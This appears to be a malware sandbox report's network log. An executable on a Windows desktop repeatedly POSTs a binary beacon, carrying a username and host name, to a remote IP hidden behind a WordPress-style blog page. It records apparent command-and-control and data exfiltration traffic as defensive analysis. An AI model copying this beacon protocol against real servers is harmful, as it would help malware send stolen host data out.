Apr 26, 2024 04:42:05.598576069 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:05.599412918 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:05.599534035 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:05.599654913 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:05.600627899 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:05.600692987 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:05.600725889 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:05.836232901 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:06.025144100 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:06.904539108 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:05 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:06.904690981 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:06.904705048 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:06.912899017 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:06.913083076 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:06.913249969 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:06.913366079 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:06.913522005 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:06.913640022 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:06.913676977 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:07.242464066 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:07.429464102 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:08.444988012 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:07 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:08.445014000 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:08.445220947 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:08.471952915 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:08.472357035 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:08.472496033 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:08.472635984 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:08.473453045 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:08.473562956 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:08.473640919 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:08.768305063 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:08.957061052 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:09.833314896 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:08 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:09.833411932 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:09.833451986 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:09.841272116 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:09.841691017 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:09.841867924 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:09.841908932 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:09.842154026 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:09.842238903 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:09.842323065 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:10.160803080 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:10.350081921 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:11.220868111 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:10 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:11.220902920 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:11.221327066 CEST	11	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 Data Ascii: UTF-8" />
Apr 26, 2024 04:42:11.221472979 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:11.230864048 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:11.231679916 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:11.231879950 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:11.231937885 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:11.232424021 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:11.232522964 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:12.565965891 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:12.752552986 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:13.653037071 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:12 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
